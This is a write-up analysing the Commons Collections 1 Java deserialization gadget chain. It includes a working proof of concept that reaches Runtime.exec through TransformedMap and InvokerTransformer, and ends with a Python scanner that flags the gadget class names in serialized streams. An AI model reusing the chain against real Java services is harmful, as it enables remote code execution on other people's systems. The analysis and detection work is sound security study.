CC1 chain (JDK 6)
Simplified cc1 (reproduction)
Analysis based on p牛's simplified cc1:
package ysoserial.payloads;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.util.HashMap;
import java.util.Map;

public class cc1 {
    public static void main(String[] args) throws Exception {
        Transformer[] transformers = new Transformer[]{
            // ignores its input and always returns the Runtime instance
            new ConstantTransformer(Runtime.getRuntime()),
            // reflectively calls exec(String) on whatever object it receives
            new InvokerTransformer("exec", new Class[]{String.class},
                    new Object[]{"C:\\Windows\\System32\\calc.exe"}),
        };
        // each transformer's output becomes the next transformer's input
        Transformer transformerChain = new ChainedTransformer(transformers);
        Map innerMap = new HashMap();
        // keyTransformer = null, valueTransformer = transformerChain: runs on every put()
        Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);
        outerMap.put("test", "xxxx");
    }
}
Set a breakpoint and debug:
Step in (F7) all the way down to find the vulnerable point; exec confirms where the vulnerability lies.
At this point the data is a byte stream, so trace back to view the call chain:
TransformedMap.decorate is used to attach keyTransformer and valueTransformer to innerMap:
Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);
keyTransformer and valueTransformer implement the Transformer interface and are used to process newly added elements.
Back in main, transformers is defined as:
new Transformer[]{
    new ConstantTransformer(Runtime.getRuntime()),
    new InvokerTransformer("exec", new Class[]{String.class},
            new Object[]{"C:\\Windows\\System32\\calc.exe"}),
};
Look at ConstantTransformer and InvokerTransformer in turn.
ConstantTransformer takes an object in its constructor and simply returns that object from its transform method.
InvokerTransformer is what achieves RCE; its source is as follows:
private final String iMethodName;   // method to call
private final Class[] iParamTypes;  // parameter types used to look the method up
private final Object[] iArgs;       // arguments passed on invocation

public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) {
    this.iMethodName = methodName;
    this.iParamTypes = paramTypes;
    this.iArgs = args;
}

public Object transform(Object input) {
    if (input == null) {
        return null;
    }
    // The excerpt ends here. In the real source the method continues by
    // looking up iMethodName on input.getClass() via reflection and
    // invoking it with iArgs.
}
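The analysis above names the classes a cc1 stream has to carry (TransformedMap, ChainedTransformer, ConstantTransformer, InvokerTransformer). From the defender's side, those class names are also what a deserialization filter or a traffic inspector can key on before ObjectInputStream ever runs. The following is an added example, not code from this post or from p牛: a small Python heuristic that pulls TC_CLASSDESC class names out of a Java serialization stream and flags the gadget classes. The byte streams it scans are constructed inline for the demo; it does not walk the full stream grammar, so it is a triage aid, not a parser.

```python
"""Heuristic scanner for Java serialization streams: lists the class names it
finds and flags the CommonsCollections1 gadget classes discussed above.
Added example (not part of the original post or p牛's code). The byte
streams below are constructed by hand for the demo, not captured payloads."""
import re
import struct

STREAM_MAGIC = b"\xac\xed\x00\x05"   # Java ObjectOutputStream header
TC_OBJECT = 0x73
TC_CLASSDESC = 0x72
TC_ENDBLOCKDATA = 0x78
TC_NULL = 0x70
SC_SERIALIZABLE = 0x02

# Classes from the cc1 chain; a stream carrying these deserves blocking or at
# least an alert before it reaches ObjectInputStream.
GADGET_CLASSES = {
    "org.apache.commons.collections.map.TransformedMap",
    "org.apache.commons.collections.functors.ChainedTransformer",
    "org.apache.commons.collections.functors.ConstantTransformer",
    "org.apache.commons.collections.functors.InvokerTransformer",
}

# Binary class names: letters, digits, '_', '$' and '.' separators.
CLASS_NAME_RE = re.compile(rb"[A-Za-z_$][\w$.]*")


def extract_class_names(stream: bytes) -> list:
    """Return class names from TC_CLASSDESC records in order of appearance.

    Heuristic: a TC_CLASSDESC tag is followed by a 2-byte big-endian length
    and the class name. A candidate is accepted only if the length fits in
    the stream and the bytes look like a class name; the stream grammar is
    not walked in full.
    """
    names = []
    i = 0
    while i + 3 <= len(stream):
        if stream[i] == TC_CLASSDESC:
            (length,) = struct.unpack(">H", stream[i + 1:i + 3])
            candidate = stream[i + 3:i + 3 + length]
            if length and len(candidate) == length and CLASS_NAME_RE.fullmatch(candidate):
                names.append(candidate.decode("ascii"))
                i += 3 + length          # skip past the name just consumed
                continue
        i += 1
    return names


def scan(stream: bytes) -> dict:
    """Summarise a blob: is it Java serialization, which classes, which gadgets."""
    is_java = stream.startswith(STREAM_MAGIC)
    classes = extract_class_names(stream) if is_java else []
    return {
        "java_serialized": is_java,
        "classes": classes,
        "gadgets": [c for c in classes if c in GADGET_CLASSES],
    }


def _class_desc(name: str) -> bytes:
    """Build a minimal TC_CLASSDESC with no fields (constructed test data)."""
    encoded = name.encode("ascii")
    return (bytes([TC_CLASSDESC]) + struct.pack(">H", len(encoded)) + encoded
            + b"\x00" * 8                          # serialVersionUID (dummy)
            + bytes([SC_SERIALIZABLE])
            + struct.pack(">H", 0)                 # field count
            + bytes([TC_ENDBLOCKDATA, TC_NULL]))   # no annotations, no superclass


# Constructed sample resembling the simplified cc1 object graph (not a real payload).
SAMPLE_CC1 = (STREAM_MAGIC + bytes([TC_OBJECT])
              + _class_desc("org.apache.commons.collections.map.TransformedMap")
              + _class_desc("java.util.HashMap")
              + _class_desc("org.apache.commons.collections.functors.ChainedTransformer")
              + _class_desc("org.apache.commons.collections.functors.ConstantTransformer")
              + _class_desc("org.apache.commons.collections.functors.InvokerTransformer"))

# Constructed benign sample: a plain HashMap.
SAMPLE_BENIGN = STREAM_MAGIC + bytes([TC_OBJECT]) + _class_desc("java.util.HashMap")

if __name__ == "__main__":
    for label, blob in (("cc1-like", SAMPLE_CC1), ("benign", SAMPLE_BENIGN)):
        print(label, "gadgets:", scan(blob)["gadgets"])
```

The scan keys only on class descriptors, so a stream that never names a gadget class passes; that is the same reason a deny list is a stopgap and an allow-list deserialization filter is the durable fix.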